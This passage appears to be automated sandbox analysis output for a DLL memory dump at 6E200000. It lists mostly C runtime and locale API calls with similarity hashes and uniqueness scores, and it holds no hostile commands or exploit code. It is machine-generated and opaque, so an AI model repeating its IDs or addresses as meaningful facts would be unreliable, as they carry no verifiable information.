                                                                                                                • API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 2499403736-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetUserDefaultLCID.KERNEL32(00000055,?,?,6E22E723,?,00000055,0000009C), ref: 6E222AA4
                                                                                                                • ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6E222AAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DefaultDownlevelLocaleNameUser___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 395733334-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                APIs
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F2FE
                                                                                                                • _wcscmp.LIBCMT ref: 6E22F30F
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F32B
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6E22F5AD,?,00000000), ref: 6E22F355
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1351282208-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlDecodePointer.NTDLL ref: 6E222EC5
                                                                                                                • _free.LIBCMT ref: 6E222EDE
                                                                                                                  • Part of subcall function 6E21B190: HeapFree.KERNEL32(00000000,00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?), ref: 6E21B1A4
                                                                                                                  • Part of subcall function 6E21B190: GetLastError.KERNEL32(00000000,?,6E2249A1,00000000,?,?,?,00000000,?,6E21CF78,00000018,6E2491C8,00000008,6E21CEC5,?,6E2117F0), ref: 6E21B1B6
                                                                                                                • _free.LIBCMT ref: 6E222EF1
                                                                                                                • _free.LIBCMT ref: 6E222F0F
                                                                                                                • _free.LIBCMT ref: 6E222F21
                                                                                                                • _free.LIBCMT ref: 6E222F32
                                                                                                                • _free.LIBCMT ref: 6E222F3D
                                                                                                                • _free.LIBCMT ref: 6E222F61
                                                                                                                • RtlEncodePointer.NTDLL(6E2E1328), ref: 6E222F68
                                                                                                                • _free.LIBCMT ref: 6E222F7D
                                                                                                                • _free.LIBCMT ref: 6E222F93
                                                                                                                • _free.LIBCMT ref: 6E222FBB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3064303923-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 484443084-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21314A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213163
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID: xD!n
                                                                                                                • API String ID: 172949856-3737725903
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2441703863-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 2376101104-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 6E219B62
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E219B6C
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E219B83
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                • codecvt.LIBCPMT ref: 6E219BA6
                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 6E219BBA
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 6E219BC8
                                                                                                                • std::_Facet_Register.LIBCPMT ref: 6E219BDE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1512642153-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 6E21324A
                                                                                                                  • Part of subcall function 6E219205: __lock.LIBCMT ref: 6E219216
                                                                                                                • int.LIBCPMTD ref: 6E213263
                                                                                                                  • Part of subcall function 6E214660: std::_Lockit::_Lockit.LIBCPMT ref: 6E214676
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_$__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 172949856-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
                                                                                                                • String ID:
                                                                                                                • API String ID: 2314865971-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ____lc_codepage_func.LIBCMT ref: 6E2193E3
                                                                                                                • __calloc_crt.LIBCMT ref: 6E2193F4
                                                                                                                  • Part of subcall function 6E21E636: __calloc_impl.LIBCMT ref: 6E21E645
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219407
                                                                                                                • _memmove.LIBCMT ref: 6E219410
                                                                                                                • ___pctype_func.LIBCMT ref: 6E219421
                                                                                                                • ____lc_locale_name_func.LIBCMT ref: 6E21942D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1321936363-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • __Getcvt.LIBCPMT ref: 6E21956A
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,?,00000002,00000000,00000000), ref: 6E2195B8
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E21962E
                                                                                                                • MultiByteToWideChar.KERNEL32(:-!n,00000009,00000001,00000001,00000000,00000000), ref: 6E219656
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$Getcvt
                                                                                                                • String ID: :-!n
                                                                                                                • API String ID: 3195005509-2832354262
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 6E2282D8
                                                                                                                  • Part of subcall function 6E21B1C8: __FF_MSGBANNER.LIBCMT ref: 6E21B1DF
                                                                                                                  • Part of subcall function 6E21B1C8: __NMSG_WRITE.LIBCMT ref: 6E21B1E6
                                                                                                                  • Part of subcall function 6E21B1C8: RtlAllocateHeap.NTDLL(6E2E134C,00000000,00000001), ref: 6E21B20B
                                                                                                                • _free.LIBCMT ref: 6E2282EB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1020059152-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetWindowsDirectoryA.KERNEL32(6E24CB58,0000019D), ref: 6E211FD6
                                                                                                                • GetModuleHandleA.KERNEL32(00000000,6E24CB58,0000019D), ref: 6E212032
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 6E212039
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Module$DirectoryFileHandleNameWindows
                                                                                                                • String ID: ^9DGU
                                                                                                                • API String ID: 9388295-529033273
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traitsconstruct
                                                                                                                • String ID: ?4!n$?4!n
                                                                                                                • API String ID: 489808500-3570167787
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: char_traits$std::ios_base::width
                                                                                                                • String ID:
                                                                                                                • API String ID: 735177774-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Mpunctstd::ios_base::getloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 76177404-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E229878
                                                                                                                • __isleadbyte_l.LIBCMT ref: 6E2298A6
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E2298D4
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,6E225423,00000001,00000000,00000000,?,00000000), ref: 6E22990A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • ___BuildCatchObject.LIBCMT ref: 6E21D320
                                                                                                                  • Part of subcall function 6E21D948: ___BuildCatchObjectHelper.LIBCMT ref: 6E21D97A
                                                                                                                  • Part of subcall function 6E21D948: ___AdjustPointer.LIBCMT ref: 6E21D991
                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6E21D337
                                                                                                                • ___FrameUnwindToState.LIBCMT ref: 6E21D349
                                                                                                                • CallCatchBlock.LIBCMT ref: 6E21D36D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                • String ID:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: swprintf
                                                                                                                • String ID: $$$
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213C74
                                                                                                                • std::ios_base::good.LIBCPMTD ref: 6E213CD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.495223947.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: std::ios_base::good
                                                                                                                • String ID: 2)!n
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%